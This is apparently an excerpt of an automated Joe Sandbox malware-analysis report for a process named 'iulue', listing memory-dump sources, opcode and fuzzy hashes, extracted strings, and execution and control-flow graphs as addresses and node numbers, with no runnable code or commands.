                                                                                                  • Opcode ID: 5d8f8c9cb5c3490ffb3724dda8f6a3777ab80f65f52a9a2de8cdf143f0ff1687
                                                                                                  • Instruction ID: a23d9f233ee5d7c2170d5c0dbe2635ee5c1bf4b7977d25893de202a85474bdb4
                                                                                                  • Opcode Fuzzy Hash: 5d8f8c9cb5c3490ffb3724dda8f6a3777ab80f65f52a9a2de8cdf143f0ff1687
                                                                                                  • Instruction Fuzzy Hash: 42E012B4D09208EFCB44DBA9D4546ACFBB5AB89314F14C1AA9C1897381C631AA42DF88
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1955135263.0000000007060000.00000040.00000800.00020000.00000000.sdmp, Offset: 07060000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_7060000_iulue.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 35db99e98c0c684d676f01fe7ba8db0221773eafefe03bee9c7985300260c21f
                                                                                                  • Instruction ID: dafbeb4228b52cb707adb74c08df568ca37bcc308b4911d127c4427f80789ebf
                                                                                                  • Opcode Fuzzy Hash: 35db99e98c0c684d676f01fe7ba8db0221773eafefe03bee9c7985300260c21f
                                                                                                  • Instruction Fuzzy Hash: 8FE08CB4D09208EBCB04DB94D8405ACBBB4AB46314F1081ECC80817340C6316E03CF84
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1928334656.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_ef0000_iulue.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 33ab262333bd20856c14763a9b13ecd2babb8e3c81d672231989a7f713d0b176
                                                                                                  • Instruction ID: 1da8082722503071767575b203dd30aefd27bf42355cae6803fbd243e2ee8c7b
                                                                                                  • Opcode Fuzzy Hash: 33ab262333bd20856c14763a9b13ecd2babb8e3c81d672231989a7f713d0b176
                                                                                                  • Instruction Fuzzy Hash: 22D012B0901208EF8B00DFA8F94195DBBF5DB44206B5045A9E408D7304DA315F009B61
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1928334656.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_ef0000_iulue.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: b8bd4cd30cb28384ce46763b71bfe64eb96ffba4396b12eeb3061062da33e2af
                                                                                                  • Instruction ID: 00de4859689bc6aec41d43b14705544d7d6ee466a4d08393e1a697c291b6fa48
                                                                                                  • Opcode Fuzzy Hash: b8bd4cd30cb28384ce46763b71bfe64eb96ffba4396b12eeb3061062da33e2af
                                                                                                  • Instruction Fuzzy Hash: B0C02B5108D7C4CFC32323A53C2C8903F28995310078500CBE488CB4E3E9448816E363
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1928334656.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_ef0000_iulue.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 1e43074088a51d5cd8d1ebc28c4956847ef7e2465c2580c4ed63f10b78c38982
                                                                                                  • Instruction ID: f52336a3d26a98ac65ca0a6e7c1db41ffb1e147c85149b1321f2cb85118f13ae
                                                                                                  • Opcode Fuzzy Hash: 1e43074088a51d5cd8d1ebc28c4956847ef7e2465c2580c4ed63f10b78c38982
                                                                                                  • Instruction Fuzzy Hash: 6BC08C0640E3C04FDB23067028B90842F70891318071A0ACBD8C0CE8ABD10C096EC323
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1928334656.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_ef0000_iulue.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 62beb0be00f51739e628f988d4f2720a87042c40a34555be1cee4259d4910112
                                                                                                  • Instruction ID: 89adc77130f569cd2b32c092967605b62478c7a35d4cbb7e584bc641f107d976
                                                                                                  • Opcode Fuzzy Hash: 62beb0be00f51739e628f988d4f2720a87042c40a34555be1cee4259d4910112
                                                                                                  • Instruction Fuzzy Hash: 36C0484888E3C26EC717A23908648996F781C5300078A00CA9080DB4A3C44C880EC322
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1928334656.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_ef0000_iulue.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 37814cf050bd6c11489f34ba0758613b99b1244b47578c5861f179c0cf34811c
                                                                                                  • Instruction ID: b23b01b28aa27a54e91dafeaf7121e5f6b3b66f967110433cc192e5ba003b82c
                                                                                                  • Opcode Fuzzy Hash: 37814cf050bd6c11489f34ba0758613b99b1244b47578c5861f179c0cf34811c
                                                                                                  • Instruction Fuzzy Hash: 6BC0482010EBC8DFEB139B60A966964BF306E5330030A56C29082CB1B3C61A9848EB62
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1928334656.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_ef0000_iulue.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: bf2a9d6afc8170bbb327a66d27d56353e40c2f1f578c6c31c32455375727661c
                                                                                                  • Instruction ID: 7d920afb28810e947ab1913a0397a9d017f8a32dd33082c9de693d0643d7d905
                                                                                                  • Opcode Fuzzy Hash: bf2a9d6afc8170bbb327a66d27d56353e40c2f1f578c6c31c32455375727661c
                                                                                                  • Instruction Fuzzy Hash: 2EB0922084A2808ADF2217246D04B243F219F17A48F5A00D18040C66A7D1288409D722
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1928334656.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_ef0000_iulue.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 65f7491215b837ba2a452ae74bcf39fbb8bed40e1ec388b27e58d318a10f6026
                                                                                                  • Instruction ID: 827d1530d0386120af733765d9e715d832e9df1d8069634c35f3cfe58fad76c3
                                                                                                  • Opcode Fuzzy Hash: 65f7491215b837ba2a452ae74bcf39fbb8bed40e1ec388b27e58d318a10f6026
                                                                                                  • Instruction Fuzzy Hash: 3690027104570C8B4550379679196557B5C95545157800051A90D816115A55A41145A5
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1928334656.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_ef0000_iulue.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: 0.q$TJiq$jjjjjj$$dq$$dq
                                                                                                  • API String ID: 0-4277727295
                                                                                                  • Opcode ID: 9206a519e61619ad1d46db0a2d6ead2e3bca9d23982bc19fa5fdd249cff6cfca
                                                                                                  • Instruction ID: 8df6cd0dd54b4820e637d2dcfad834d06014ff425f5a3638a775ea049fbd0050
                                                                                                  • Opcode Fuzzy Hash: 9206a519e61619ad1d46db0a2d6ead2e3bca9d23982bc19fa5fdd249cff6cfca
                                                                                                  • Instruction Fuzzy Hash: F4B09230201201CE8B05CE008184870BB70FB81A0032090EAC1031E461C7208987EA02
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1928334656.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_ef0000_iulue.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: 0.q$TJiq$jjjjjj$$dq$$dq
                                                                                                  • API String ID: 0-4277727295
                                                                                                  • Opcode ID: 1bf6c21135076003abcb51d45ea18385fd949b4fd43a25a732ad799259566305
                                                                                                  • Instruction ID: 798fffd2f20bc40751f7e2de6fe9540e73a36ec57ca657b9dcf0ebd1c1f4f9bd
                                                                                                  • Opcode Fuzzy Hash: 1bf6c21135076003abcb51d45ea18385fd949b4fd43a25a732ad799259566305
                                                                                                  • Instruction Fuzzy Hash: ECB09230201201CE8B01CE108184875B370FF81A0032490AAC1031E851C72089C7EB02
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1928334656.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_ef0000_iulue.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: 0.q$TJiq$jjjjjj$$dq$$dq
                                                                                                  • API String ID: 0-4277727295
                                                                                                  • Opcode ID: eb4d70d56b776525d5dfdc6427c72c9ef9d3fe077124ef677f5fd853914f44db
                                                                                                  • Instruction ID: d4621f7bc111c6ad529aee04c28ac2e1621f6eb12d72c58152e82dfd1a91fe2f
                                                                                                  • Opcode Fuzzy Hash: eb4d70d56b776525d5dfdc6427c72c9ef9d3fe077124ef677f5fd853914f44db
                                                                                                  • Instruction Fuzzy Hash: CCB0922180E3C1CECB134E9585C0040BF30AA62181309C1FBC4850E447C12485C6D732
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1928334656.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_ef0000_iulue.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: 0.q$TJiq$jjjjjj$$dq$$dq
                                                                                                  • API String ID: 0-4277727295
                                                                                                  • Opcode ID: 502926c432aef1c667503b6dcf0a09e67bac789901a92a40a4b16ba04f93daed
                                                                                                  • Instruction ID: d1b807d091a72b348f5d18b92262a6f1c9c733aeeb3b2ae1bfeea7fb3b2462c3
                                                                                                  • Opcode Fuzzy Hash: 502926c432aef1c667503b6dcf0a09e67bac789901a92a40a4b16ba04f93daed
                                                                                                  • Instruction Fuzzy Hash: D3B0113020A000CECB00EE00C0C0A3033B2FB82B0AB38E0E8C00B0F888C330AC82EB20

                                                                                                  Execution Graph

                                                                                                  Execution Coverage:11%
                                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                                  Signature Coverage:0%
                                                                                                  Total number of Nodes:25
                                                                                                  Total number of Limit Nodes:6
                                                                                                  execution_graph 25183 1120848 25185 112084e 25183->25185 25184 112091b 25185->25184 25188 1121380 25185->25188 25194 1121488 25185->25194 25190 11212f7 25188->25190 25191 112138b 25188->25191 25189 1121480 25189->25185 25190->25185 25191->25189 25193 1121488 GlobalMemoryStatusEx 25191->25193 25200 1127ea8 25191->25200 25193->25191 25196 1121396 25194->25196 25197 112148f 25194->25197 25195 1121480 25195->25185 25196->25195 25198 1127ea8 GlobalMemoryStatusEx 25196->25198 25199 1121488 GlobalMemoryStatusEx 25196->25199 25197->25185 25198->25196 25199->25196 25201 1127eb2 25200->25201 25202 1127ecc 25201->25202 25205 6a4fab8 25201->25205 25209 6a4faa9 25201->25209 25202->25191 25207 6a4facd 25205->25207 25206 6a4fce2 25206->25202 25207->25206 25208 6a4fcf7 GlobalMemoryStatusEx 25207->25208 25208->25207 25211 6a4facd 25209->25211 25210 6a4fce2 25210->25202 25211->25210 25212 6a4fcf7 GlobalMemoryStatusEx 25211->25212 25212->25211

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 0 6a43100-6a43121 1 6a43123-6a43126 0->1 2 6a4314c-6a4314f 1->2 3 6a43128-6a43147 1->3 4 6a43155-6a43174 2->4 5 6a438f0-6a438f2 2->5 3->2 13 6a43176-6a43179 4->13 14 6a4318d-6a43197 4->14 7 6a438f4 5->7 8 6a438f9-6a438fc 5->8 7->8 8->1 10 6a43902-6a4390b 8->10 13->14 15 6a4317b-6a4318b 13->15 18 6a4319d-6a431ac 14->18 15->18 126 6a431ae call 6a43920 18->126 127 6a431ae call 6a43918 18->127 19 6a431b3-6a431b8 20 6a431c5-6a434a2 19->20 21 6a431ba-6a431c0 19->21 42 6a438e2-6a438ef 20->42 43 6a434a8-6a43557 20->43 21->10 52 6a43580 43->52 53 6a43559-6a4357e 43->53 55 6a43589-6a4359c 52->55 53->55 57 6a435a2-6a435c4 55->57 58 6a438c9-6a438d5 55->58 57->58 61 6a435ca-6a435d4 57->61 58->43 59 6a438db 58->59 59->42 61->58 62 6a435da-6a435e5 61->62 62->58 63 6a435eb-6a436c1 62->63 75 6a436c3-6a436c5 63->75 76 6a436cf-6a436ff 63->76 75->76 80 6a43701-6a43703 76->80 81 6a4370d-6a43719 76->81 80->81 82 6a43779-6a4377d 81->82 83 6a4371b-6a4371f 81->83 84 6a43783-6a437bf 82->84 85 6a438ba-6a438c3 82->85 83->82 86 6a43721-6a4374b 83->86 97 6a437c1-6a437c3 84->97 98 6a437cd-6a437db 84->98 85->58 85->63 93 6a4374d-6a4374f 86->93 94 6a43759-6a43776 86->94 93->94 94->82 97->98 100 6a437f2-6a437fd 98->100 101 6a437dd-6a437e8 98->101 105 6a43815-6a43826 100->105 106 6a437ff-6a43805 100->106 101->100 104 6a437ea 101->104 104->100 110 6a4383e-6a4384a 105->110 111 6a43828-6a4382e 105->111 107 6a43807 106->107 108 6a43809-6a4380b 106->108 107->105 108->105 115 6a43862-6a438b3 110->115 116 6a4384c-6a43852 110->116 112 6a43830 111->112 113 6a43832-6a43834 111->113 112->110 113->110 115->85 117 6a43854 116->117 118 6a43856-6a43858 116->118 117->115 118->115 126->19 127->19
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.2969747326.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_7_2_6a40000_iulue.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: $dq$$dq$$dq$$dq$$dq$$dq
                                                                                                  • API String ID: 0-2331353128
                                                                                                  • Opcode ID: 855dcb1de9c12bf365365b342d320ef64ab8cd95b21f4e1349e935fa507d4361
                                                                                                  • Instruction ID: d2e832b2ab6b29929f3c047283585e0daf93b27620af8d408bf5b90779ffc09e
                                                                                                  • Opcode Fuzzy Hash: 855dcb1de9c12bf365365b342d320ef64ab8cd95b21f4e1349e935fa507d4361
                                                                                                  • Instruction Fuzzy Hash: 57322F31E1071ACFDB15EF65C95059DB7B2BFD9300F20C6A9D449AB264EB30AA85CB90

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 1183 6a47df0-6a47e0e 1184 6a47e10-6a47e13 1183->1184 1185 6a47e34-6a47e37 1184->1185 1186 6a47e15-6a47e2f 1184->1186 1188 6a47e44-6a47e47 1185->1188 1189 6a47e38-6a47e43 1185->1189 1186->1185 1191 6a47e5e-6a47e61 1188->1191 1192 6a47e49-6a47e57 1188->1192 1193 6a47e84-6a47e86 1191->1193 1194 6a47e63-6a47e7f 1191->1194 1199 6a47e96-6a47eac 1192->1199 1200 6a47e59 1192->1200 1197 6a47e8d-6a47e90 1193->1197 1198 6a47e88 1193->1198 1194->1193 1197->1184 1197->1199 1198->1197 1204 6a480c7-6a480d1 1199->1204 1205 6a47eb2-6a47ebb 1199->1205 1200->1191 1206 6a47ec1-6a47ede 1205->1206 1207 6a480d2-6a480dc 1205->1207 1215 6a480b4-6a480c1 1206->1215 1216 6a47ee4-6a47f0c 1206->1216 1210 6a4812d-6a4813e 1207->1210 1211 6a480de-6a48107 1207->1211 1221 6a48140-6a48184 1210->1221 1222 6a48123-6a48127 1210->1222 1213 6a48109-6a4810c 1211->1213 1217 6a48341-6a48344 1213->1217 1218 6a48112-6a48121 1213->1218 1215->1204 1215->1205 1216->1215 1240 6a47f12-6a47f1b 1216->1240 1219 6a48346-6a48362 1217->1219 1220 6a48367-6a4836a 1217->1220 1218->1221 1218->1222 1219->1220 1223 6a48415-6a48417 1220->1223 1224 6a48370-6a4837c 1220->1224 1231 6a48315-6a4832b 1221->1231 1232 6a4818a-6a4819b 1221->1232 1222->1210 1229 6a4841e-6a48421 1223->1229 1230 6a48419 1223->1230 1234 6a48387-6a48389 1224->1234 1229->1213 1233 6a48427-6a48430 1229->1233 1230->1229 1231->1217 1247 6a48300-6a4830f 1232->1247 1248 6a481a1-6a481be 1232->1248 1238 6a483a1-6a483a5 1234->1238 1239 6a4838b-6a48391 1234->1239 1245 6a483a7-6a483b1 1238->1245 1246 6a483b3 1238->1246 1242 6a48395-6a48397 1239->1242 1243 6a48393 1239->1243 1240->1207 1244 6a47f21-6a47f3d 1240->1244 1242->1238 1243->1238 1256 6a480a2-6a480ae 1244->1256 1257 6a47f43-6a47f6d 1244->1257 1249 6a483b8-6a483ba 1245->1249 1246->1249 1247->1231 1247->1232 1248->1247 1261 6a481c4-6a482ba call 6a46618 1248->1261 1252 6a483bc-6a483bf 1249->1252 1253 6a483cb-6a48404 1249->1253 1252->1233 1253->1218 1271 6a4840a-6a48414 1253->1271 1256->1215 1256->1240 1269 6a47f73-6a47f9b 1257->1269 1270 6a48098-6a4809d 1257->1270 1318 6a482bc-6a482c6 1261->1318 1319 6a482c8 1261->1319 1269->1270 1277 6a47fa1-6a47fcf 1269->1277 1270->1256 1277->1270 1283 6a47fd5-6a47fde 1277->1283 1283->1270 1284 6a47fe4-6a48016 1283->1284 1292 6a48021-6a4803d 1284->1292 1293 6a48018-6a4801c 1284->1293 1292->1256 1295 6a4803f-6a48096 call 6a46618 1292->1295 1293->1270 1294 6a4801e 1293->1294 1294->1292 1295->1256 1320 6a482cd-6a482cf 1318->1320 1319->1320 1320->1247 1321 6a482d1-6a482d6 1320->1321 1322 6a482e4 1321->1322 1323 6a482d8-6a482e2 1321->1323 1324 6a482e9-6a482eb 1322->1324 1323->1324 1324->1247 1325 6a482ed-6a482f9 1324->1325 1325->1247
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.2969747326.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_7_2_6a40000_iulue.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: $dq$$dq
                                                                                                  • API String ID: 0-2340669324
                                                                                                  • Opcode ID: e71916a08097daecb140e88a3282159359030755f6cc882a75dbeeace2b6b457
                                                                                                  • Instruction ID: d81067e473e8d68bbaa582a552e34d4ce9ca21b807fc73f7939cba9d55bbbf85
                                                                                                  • Opcode Fuzzy Hash: e71916a08097daecb140e88a3282159359030755f6cc882a75dbeeace2b6b457
                                                                                                  • Instruction Fuzzy Hash: 0902BC30B112159FDB55EB69E990AAEB7F6FFC4310F208929E5059B394DB35EC42CB80
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.2969747326.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_7_2_6a40000_iulue.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 53d2b5afdeb31cfb5a5d94e3a743ab71d4f02b85b41e3115a8c46f9fc19dd0f7
                                                                                                  • Instruction ID: d90424e26007eb69d763640af0080c832338fd33bad927303beddb764aa10428
                                                                                                  • Opcode Fuzzy Hash: 53d2b5afdeb31cfb5a5d94e3a743ab71d4f02b85b41e3115a8c46f9fc19dd0f7
                                                                                                  • Instruction Fuzzy Hash: 76925534A002048FDB64EB68C984B9DBBF2FF85314F5485A9E449AF365DB75ED81CB80
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.2969747326.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_7_2_6a40000_iulue.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: be2f8c8a52e084d65f42ab31bc0843003fc61b361f8afbbb69ff363eeff2f810
                                                                                                  • Instruction ID: 618952f0ce6233c69d6ac13e440cc9ba6ca5e15e385fa8eac66c47590138ba1a
                                                                                                  • Opcode Fuzzy Hash: be2f8c8a52e084d65f42ab31bc0843003fc61b361f8afbbb69ff363eeff2f810
                                                                                                  • Instruction Fuzzy Hash: 9B627A30A002159FDB55EB68D990BAEB7F2EFC9314F149569E40AEB394DB31EC41CB80
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.2969747326.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_7_2_6a40000_iulue.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: d8e126727a07cd3dd3ceedb3b9a4aa95740f8dfa4e204c37295f531b5b88afbf
                                                                                                  • Instruction ID: 71758ccc447363e93544656a8844183a7192737002021d78904b0821325bdaae
                                                                                                  • Opcode Fuzzy Hash: d8e126727a07cd3dd3ceedb3b9a4aa95740f8dfa4e204c37295f531b5b88afbf
                                                                                                  • Instruction Fuzzy Hash: 69329030B012199FDB55FB69D990BAEB7B2FB88320F108525E50ADB395DB34EC41CB91
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.2969747326.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_7_2_6a40000_iulue.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: e1bb3e0a66e8173fa2592d3c5d49650de14d8646e3e2af04c0594981750c45dd
                                                                                                  • Instruction ID: 94e517d3efbf50360e282f5793fdadf4c9e1fa483ba06b09e08f5c618a7dd138
                                                                                                  • Opcode Fuzzy Hash: e1bb3e0a66e8173fa2592d3c5d49650de14d8646e3e2af04c0594981750c45dd
                                                                                                  • Instruction Fuzzy Hash: 7A12CF71E002159BDF65FB64D88066EB7A6FFC5310F248839E85A9F385DA35EC41CB90
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.2969747326.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_7_2_6a40000_iulue.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 580739fc378c6ba169e421ba31d8f39c83cb704ef04052d369f6cde950fa3531
                                                                                                  • Instruction ID: d9e2a92673e490a815694e6b9b84a83988bad8fff3260173dbbb8d06b798104e
                                                                                                  • Opcode Fuzzy Hash: 580739fc378c6ba169e421ba31d8f39c83cb704ef04052d369f6cde950fa3531
                                                                                                  • Instruction Fuzzy Hash: 5A226070E102199FEF64FB68C9907AEB7B5EB89310F208925E459DB391DB34DC81CB61
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.2969747326.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_7_2_6a40000_iulue.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: $dq$$dq$$dq$$dq$$dq$$dq
                                                                                                  • API String ID: 0-2331353128
                                                                                                  • Opcode ID: 39c8897ccfe3b678fe3879c74a6c8df6216eea860580bcd3b18448b797cbe22c
                                                                                                  • Instruction ID: 8855e67b8dd740ea15260e12fde38b2c40614fc0690d9e36c14d6e079240f286
                                                                                                  • Opcode Fuzzy Hash: 39c8897ccfe3b678fe3879c74a6c8df6216eea860580bcd3b18448b797cbe22c
                                                                                                  • Instruction Fuzzy Hash: 89026E70E1021A8FDBA4FB69D9906ADB7B2FF85310F208965E405DF391DB31E941CBA1

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 298 6a491c0-6a491e5 299 6a491e7-6a491ea 298->299 300 6a49210-6a49213 299->300 301 6a491ec-6a4920b 299->301 302 6a49ad3-6a49ad5 300->302 303 6a49219-6a4922e 300->303 301->300 304 6a49ad7 302->304 305 6a49adc-6a49adf 302->305 309 6a49246-6a4925c 303->309 310 6a49230-6a49236 303->310 304->305 305->299 307 6a49ae5-6a49aef 305->307 315 6a49267-6a49269 309->315 312 6a49238 310->312 313 6a4923a-6a4923c 310->313 312->309 313->309 316 6a49281-6a492f2 315->316 317 6a4926b-6a49271 315->317 328 6a492f4-6a49317 316->328 329 6a4931e-6a4933a 316->329 318 6a49275-6a49277 317->318 319 6a49273 317->319 318->316 319->316 328->329 334 6a49366-6a49381 329->334 335 6a4933c-6a4935f 329->335 340 6a49383-6a493a5 334->340 341 6a493ac-6a493c7 334->341 335->334 340->341 346 6a493f2-6a493fc 341->346 347 6a493c9-6a493eb 341->347 348 6a4940c-6a49486 346->348 349 6a493fe-6a49407 346->349 347->346 355 6a494d3-6a494e8 348->355 356 6a49488-6a494a6 348->356 349->307 355->302 360 6a494c2-6a494d1 356->360 361 6a494a8-6a494b7 356->361 360->355 360->356 361->360
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.2969747326.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_7_2_6a40000_iulue.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: $dq$$dq$$dq$$dq
                                                                                                  • API String ID: 0-185584874
                                                                                                  • Opcode ID: 3045149d59ff90cb102ccf6c651295f19a2382d115c70519f6d8e6bea4b08f8e
                                                                                                  • Instruction ID: df2155f47cf97b1dd5a627aa5c607fac89c1b3abb627142b5e7b8f5d2eada752
                                                                                                  • Opcode Fuzzy Hash: 3045149d59ff90cb102ccf6c651295f19a2382d115c70519f6d8e6bea4b08f8e
                                                                                                  • Instruction Fuzzy Hash: 60915230B1021A9FDB95EF65D9507AFB7F6AFC5200F108569D809EB388EF709D428B91

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
